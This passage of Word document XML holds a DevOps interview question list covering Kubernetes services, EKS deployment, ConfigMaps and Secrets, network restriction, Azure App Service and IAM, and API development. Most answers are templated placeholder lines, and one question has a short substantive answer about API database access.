          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Services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an application externally?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is the equivalent of Docker port mapping in Kubernetes?</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equivalent of Docker port mapping in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do containerPort, port, and targetPort work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Services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containerPort, port, and targetPort work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How do you deploy an application using Kubernetes manifest files?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Manifests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Manifests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an application using Kubernetes manifest files?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the kubectl apply command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Commands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kubectl apply command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. After pushing an image to ECR, what is the next step?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EKS/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the EKS/Deployment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pushing an image to ECR, what is the next step?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How do you update the Deployment manifest with the new image?</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update the Deployment manifest with the new image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. If the latest image is pushed but the pod is still using the old image, how do you refresh it?</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latest image is pushed but the pod is still using the old image, how do you refresh it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Have you worked on Helm charts?</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Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Explain an automated deployment pipeline for a FastAPI application to EKS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/EKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/EKS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an automated deployment pipeline for a FastAPI application to EKS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. What checks would you perform before deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the DevSecOps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checks would you perform before deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How would you perform code formatting, linting, unit testing, vulnerability scanning, secret scanning, and image scanning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the DevSecOps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perform code formatting, linting, unit testing, vulnerability scanning, secret scanning, and image scanning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Where would you push the Docker image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Container Registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Container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would you push the Docker image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How would you deploy the image after pushing it to ECR?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/EKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/EKS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the image after pushing it to ECR?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How would you automate the deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/Automation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automate the deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. What is a ConfigMap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Config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ConfigMap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. What is stored inside a ConfigMap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Config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stored inside a ConfigMap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. What are Kubernetes Secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Secrets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Kubernetes Secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. How do you use Secrets inside a pod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Secrets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use Secrets inside a pod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. What is the difference between ConfigMap and Secret?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Config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ConfigMap and Secret?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. How can you expose a service only to users inside your organization?</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can you expose a service only to users inside your organization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. Without using SSO or RBAC, how would you restrict access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Networking/Security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Without using SSO or RBAC, how would you restrict access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. Can NetworkPolicy solve this problem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/NetworkPolicy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/NetworkPolicy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NetworkPolicy solve this problem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How would you whitelist an organization's CIDR/IP range?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Networking/Security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whitelist an organization's CIDR/IP range?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. What is the role of an Internal Load Balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking/Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Networking/Load Balancer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an Internal Load Balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. What is service-to-service authentication?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Service Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Service Auth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service-to-service authentication?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. How do two services communicate securely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Service Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Service Auth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two services communicate securely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. How would an App Service communicate with PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/PostgreSQL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an App Service communicate with PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. How would you authorize App Service to access PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/IAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/IAM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authorize App Service to access PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. How do Managed Identities work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/IAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/IAM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Managed Identities work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. How do you provide Contributor access to an App Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/IAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/IAM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provide Contributor access to an App Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. What is Azure App Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/App Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/App Service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Azure App Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. What is App Service used for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/App Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/App Service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App Service used for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. How do applications hosted on App Service connect to a database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/App Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/App Service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applications hosted on App Service connect to a database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. How comfortable are you with API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APIs/Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the APIs/Development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comfortable are you with API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. Have you built APIs yourself?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APIs/Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the APIs/Development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built APIs yourself?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. How does an API read and write data to a database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APIs/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The API receives a request, validates it, authenticates and authorizes the caller, then calls a service or repository layer to interact with the database. For reads, it queries data, maps it to a response model, and returns it. For writes, it validates business rules, starts a transaction if needed, writes data, commits, and returns a response. In production, I use connection pooling, parameterized queries or ORM protections, migrations, indexes, timeouts, and clear transaction boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. What is your understanding of API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
